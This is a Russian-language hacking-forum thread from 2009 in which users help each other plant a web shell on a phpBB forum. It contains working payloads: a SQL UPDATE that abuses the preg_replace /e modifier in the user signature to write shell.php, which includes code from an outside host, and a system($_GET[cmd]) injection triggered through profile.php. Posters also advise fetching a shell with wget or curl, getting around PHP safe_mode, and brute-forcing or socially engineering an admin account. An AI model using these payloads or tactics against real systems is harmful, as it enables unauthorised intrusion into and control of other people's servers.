ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 02.05.2009, 14:57
laedafess
Познающий
Регистрация: 11.02.2009
Сообщений: 98
С нами: 9076508

Репутация: 169
По умолчанию

вот тебе все способы ^__^. На все форумах, что я пробовал, работал 4-й способ.
 
Ответить с цитированием

  #2  
Старый 02.05.2009, 15:44
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами: 9619229

Репутация: 445


По умолчанию

laedafess ок фенкс. 4 способ действительно проканал. (высвечиваеться phpinfo) но я чет не догоняю как залить с помощью этого шелл
Вот код который импортирую

UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:
$file= fopen(`shell.php`,`w`);
fwrite($file, `<? @include("http://diznt.narod.ru/info2.txt"); ?>`);
fclose($file);' WHERE user_id=2;

Получаеться в подписи сам код!

phpbb
$file= fopen(`shell.php`,`w`);
fwrite($file, `<? @include("http
fclose($file);

При этом сам файл shell.php не создаеться!
 
Ответить с цитированием

  #3  
Старый 02.05.2009, 16:48
laedafess
Познающий
Регистрация: 11.02.2009
Сообщений: 98
С нами: 9076508

Репутация: 169
По умолчанию

импортируешь код:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:system($_GET[cmd])' WHERE user_id=2;

потом site.com/phpBB2/profile.php?mode=editprofile&cmd=ls -lia
ну как то так)
и льешь шелл. Через wget, curl или fetch..
 
Ответить с цитированием

  #4  
Старый 02.05.2009, 17:58
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами: 9619229

Репутация: 445


По умолчанию

laedafess

Не канает
Подредактировал скрипт чуть (так как ты не правильно написал чуток)
При заходе на страницу (без GET запроса)
Пишет:


Warning: shell_exec() has been disabled for security reasons in /www/****/**.ru/html/forum/includes/usercp_register.php(895) : regexp code on line 1

Warning: system() has been disabled for security reasons in /www/****/**.ru/html/forum/includes/usercp_register.php(895) : regexp code on line 1


А если переходить вместе с GETом то идет редирект на главную страницу форума
 
Ответить с цитированием

  #5  
Старый 02.05.2009, 18:05
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Ну значит отключены ф-кции.
 
Ответить с цитированием

  #6  
Старый 02.05.2009, 18:08
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами: 9619229

Репутация: 445


По умолчанию

mailbrush ну так это то ясно что отключенны функции
я имею ввиду есть еще какие нибуть методы?
 
Ответить с цитированием

  #7  
Старый 02.05.2009, 18:33
InFlame
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
С нами: 9230381

Репутация: 90
По умолчанию

У меня похожая ситуация, при подстановке system($_GET[cmd]) ничего не выходит, хотя функции включены...
 
Ответить с цитированием

  #8  
Старый 02.05.2009, 18:33
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
С нами: 10158086

Репутация: 1359


По умолчанию

в общем там сейф мод=он
попробуй другие функции, например passthru.(хотя скорее всего тоже не пройдет)
ищи способы обхода сейф мода(в гугл с запросом safe_mode bypass )

хотя, имхо, тебе еще рано.
 
Ответить с цитированием

  #9  
Старый 02.05.2009, 22:02
_FallenAngel_
Новичок
Регистрация: 21.02.2009
Сообщений: 11
С нами: 9061643

Репутация: 10
По умолчанию

Я знаю акк админа на одном сайте созданым на юкоз,можно ли с помощью его както взломать панель управления?
 
Ответить с цитированием

  #10  
Старый 02.05.2009, 23:51
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Можно. СИ / Брут.
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.